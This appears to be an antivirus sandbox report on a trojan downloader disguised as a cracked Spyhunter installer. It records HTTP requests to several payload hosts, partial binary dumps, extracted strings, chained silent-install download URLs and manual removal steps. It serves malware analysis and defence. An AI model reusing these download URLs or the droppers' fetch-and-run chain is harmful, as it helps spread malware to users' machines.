Set-Cookie: enc_aff_session_4=ENC02084-1022f4084f4437fa972b996a344e06-1006-4-0-0-0-0-UA-0-3131-31353035-37393830323338-30-30-30-37.57.16.189-20160420120248-_-1B02683471047E0C120A657C7B1855496821575D185A455A16795204062C64180443130C7A7D1C5267; expires=Fri, 20 May 2016 16:02:48 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Sat, 16 Mar 2019 02:42:48 GMT; path=/;
tracking_id: 1022f4084f4437fa972b996a344e06
X-Robots-Tag: noindex, nofollow
Content-Length: 439
Connection: Close<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXp://up2.dfiledownload28.space/offer.php?affId=1006&tracki
ngId=35447853&instId=11&ho_trackingid=1022f4084f4437fa972b996a
344e06&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac
=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a>
.</p>.</body></html>...<<< skipped >>>
GET /stub_maker.php?program=sevenzip&tid=7980238&pid=1505&b_typ=pe&reb=1&name=Spyhunter v 4.15.1.4270 crack [090416BAP] HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.wold3a.space
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 66838
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="5717a811a2c0c.exe"
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2016 16:02:26 GMT
X-Cache: Miss from cloudfront
Via: 1.1 85c4a5a6503bea202117be835a822b6f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: of4cvw72Jo0f20zFdLWJ6MV1CigeRJKnInc3kA8QjvwZob6Fkezv2A==MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
.........................@.................................@..........
......................`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
[email protected]......
.........................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ<<< skipped >>>
GET hXXp://up2.dfiledownload28.space/offer.php?affId=1006&trackingId=35447853&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Wed, 20 Apr 2016 16:02:35 GMT
Connection: close
Content-Length: 76840..M.r......vV^. .N.[[email protected].."..Zj....4.............5/.O.......8
.CK......;[email protected].!.S....=...X?.<.f....\LU ....t.,.E....Z.a8
Q[]...hl.4 'wnZ.l...S..y...sV.3..p..R.*.?z...~..E.......r&..S.t.. &..K
.M6..ze.>...`6.l....o.c.S.......U.`....K"..|_.^y...j.._.:e.I...UY.h
.6....f......a.........nfs......WB: e....8....?yT............f0.Zb...&
u..-6..y..R.... .!q.L.Q.......P.dK."......83.....!..]:R..A..5_^..|...P
....zEv?.... ../..."....'b........Z...x.....o~...C....OU].i8..........
..W;.j... ......v].Xa......IH....8....5I.%...*.J:....A`.tF.W..N...Ug.E
Dv..Q.....JD..Y.)...l...~/7..H.e..I...K!SIl..-.Mk;E/].......(@...NR.Lu
...j...L....W..[..*.../R../.A.FI.C;...'....(X,....eges..DC..z..L.....c
...].K^.d{..;..'.(K..(...d......g..?|..&-..m_.....G;@{..........}. ..n
<Y.6.7......&.(.7.C.D..'@...MA.o.....k.%*...s1.c..Rx..{..M.Ev.0e..`
....N..u}.../.w...;......8.S..k.6...........&.ho...Y...)....".=..\P.A.
"[email protected]...)x"...4h...g......t.p......4.... .g..8-#W.
M2...C....V..|.}r..eK5.c..j!6.......;~&.....Y.J....] ./...^J#.........
....X......Ou....W...]H....s.........C~..g..G...c/..Y..W.K...<..m..
c.....x|..$......e..<..WP...#.W !...E.M...hf...n9m..o..R..<.Iz.X
....ohgj.:...O\M.".`3`Il..|7....=.m_..=zg.,8.";..^..[u...q.9<......
..L5.@..(}.....J....X..$.]]...o.....U..TfNt&...vq&5T.............V"...
..=.w...rX3#........1.7/..I.........@....../..J.~?.u.Sui.......5I... .
.jj.h.|..._.D....$=q..?......../..I..oN. . ._...j/h3....(..V....S..9.f
.Xw%[email protected]]....u. .....u...F....,'.q<<< skipped >>>
GET hXXp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=1022f4084f4437fa972b996a344e06&trackingId=35447853&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1358&id[]=1359&id[]=1364&id[]=1365 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Wed, 20 Apr 2016 16:02:37 GMT
Connection: close
Content-Length: 449576.4..-.......-n...l......G..j...h.A.t.8.v^....7...5h....cn.....C..y..&T
.9 ..JF?.!}]#z... =...v..l..!d.*`X._.OWO..z...u..Y......_..........3S.
.....B[G...4..6.<......m...9.....x.<t.l-.0.H.Y..u..rB.6R7...>
...}..J/_.I..w..8..... K.h..d@_:..O........I;.mS#._..i..MS....[.?..zaF
.E..K8.s.@...~.K,^.0..<....0..wu.D^..[..3...........X...p?.W.T.s..j
.VT...;m?...2..9....3..G y.....4..".q...p.......`.n..Id.g....=s.....0.
....!J..1.X.u.........o..!$...48..#...y*5...i..I%.EQ!.....F5.iO..{.{vt
....S...8..E.pO7.n...*..sd-...N(. .)_....|.....g..ui.p.b.P.3....I.....
3IE}..s`.h..-K6.7V.o...*J..XY}.........hY>lw3!\....9..q..hVgm7.....
e..p...Pv.VzbO...V..8"....H...7..0...[w.w.=V.Db.q...^..qj.....|M].....
%.n1.J..........U.I....h.SA.F...f`?. gh..Y.e.....^.j%G#V3..9.S.Ed..?-w
...D.h....e....{..o.|.......N6..l;..->....x.h........s..U..yr....no
}4.V.&..C-....}V{.{o....`7.C.....w..[....hS....G.y.Lz..3.K{.C.t......}
..|xI.9.O*.q..z.....{...w....(..bb..\.o....V....4U..N%.@........|.a..A
.5w...7..i...`.....Q........n/....s.&.HQ.7...`.t..>....XC..K...8p..
...h.xe.ch....ce.......O.g...S0....,.....s... .....YK?*..cAxB..... ..T
....,/...Q....zn6.CR..jl...S[.h..q....p.z.5.......=H7.....'..Z.qc.....
..J....2..9R.3..Pf.df.....d2(.7c>.._....g.2.MTZ&\...{.].."(..7....)
...}......E...s...\...N5.R*zIc!.}..,.......*....25.Mdhni_.r..O...Hn|..
.V..#.v..Q.m...!..Y.F....t.8.#-...0t.H..O...\=..-dY...kgw..f..;j...
...v.TvL.=..aw".1....h~r....;..N...U..M....)m<.0...JW..t3....z.....
.7.m.@..<.........-.e.E......U.5.g...3.!..^...Pq.cE....K...L...<<< skipped >>>
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\Htf9HUBEiO.exe
&tid=7980238&pid=1505&b_typ=pe&reb=1&name=Spyhunter v 4.15.1.4270 crack [090416BAP]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp
rogram=sevenzip&tid=7980238&pid=1505&b_typ=pe&reb=1&name=Spyhunter v 4.15.1.4270 crack [090416BAP]
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
.reloc
System.dll
callback%d
FtpCreateDir faile
nsh2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\Rtcf1VkJ8g
nzip&tid=7980238&pid=1505&b_typ=pe&reb=1&name=Spyhunter v 4.15.1.4270 crack [090416BAP]
l.wold3a.space/stub_maker.php?program=sevenzip&tid=7980238&pid=1505&b_typ=pe&reb=1&name=Spyhunter v 4.15.1.4270 crack [090416BAP]
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201604201602
hXXp://dl.wold3a.space/stub_maker.php?program=sevenzip&tid=7980238&pid=1505&b_typ=pe&reb=1&name=Spyhunter v 4.15.1.4270 crack [090416BAP]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
%original file name%.exe_1988_rwx_10004000_00001000:
callback%d
Htf9HUBEiO.exe_704:
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
O8,reA
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")Exec: success ("%s")Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")ExecShell: warning: error ("%s": file:"%s" params:"%s")=%dExch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")RMDir: RemoveDirectory on Reboot("%s")RMDir: RemoveDirectory("%s")RMDir: RemoveDirectory invalid input("%s")Delete: DeleteFile failed("%s")Delete: DeleteFile on Reboot("%s")Delete: DeleteFile("%s")%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\cpSetup.exe"
23/SevenZip_downloader-Q5Iq1ohG4.exe
upurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\NSISdl.dll
1.1.1.6
Software\Microsoft\Windows\CurrentVersion\Internet Settings
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp
cpSetup.exe
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\cpSetup.exe"")ISdl.dll"
er%20v%204.15.1.4270%20crack%20&s1=1505&s2=7980238&setupName=cpSetup&appVersion=2.92&instId=11
etup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
Spyhunter v 4.15.1.4270 crack Setup
1628514
323/SevenZip_downloader-Q5Iq1ohG4.exe
oader-Q5Iq1ohG4.exe
cli/1461164476323/SevenZip_downloader-Q5Iq1ohG4.exe
456789 /
pyhunter v 4.15.1.4270 crack
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\Htf9HUBEiO.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp
Htf9HUBEiO.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
6515488
hXXp://get.gribbyk.space/?affId=1006&appTitle=Spyhunter%20v%204.15.1.4270%20crack%20&s1=1505&s2=7980238&setupName=cpSetup&appVersion=2.92&instId=11
p&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
nloader-Q5Iq1ohG4.exe
hXXp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=7980238&b_typ=pe&n=U3B5aHVudGVyIHYgNC4xNS4xLjQyNzAgY3JhY2sg&reb=1&ic=
Htf9HUBEiO.exe_704_rwx_10001000_00007000:
.text
`.rdata
@.data
.rsrc
@.reloc
/key=
cpSetup.exe_1620:
.text
`.rdata
@.data
.rsrc
@.reloc
&:Z%f
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
Ole32.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
zcÁ
:::#222.111 )))
#include "windows.h"
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS></application></compatibility></assembly>7 7$7(7,7074787
9$9(9,909
0\0c0k0p0t0x0
11F1
0$0(0,000
6 6$6(6,606
Bmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\cpSetup.exe
cpSetup.exe_1620_rwx_003A0000_0000D000:
.text
`.rdata
@.data
.rsrc
@.reloc
.UW J
x.hpg
%C;JN
-9}6I
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTP
FirefoxURL
Firefox
ChromeHTML
Chrome
hXXp://
KERNEL32.dll
GetProcessHeap
:::#222.111 )))
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\cpSetup.exe (20479 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\731628514 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00115215.a (1730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\001147d4.a (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\Rtcf1VkJ8g (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\Htf9HUBEiO.exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\5717a811a2c0c[1].exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\launch_reb[1].htm (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.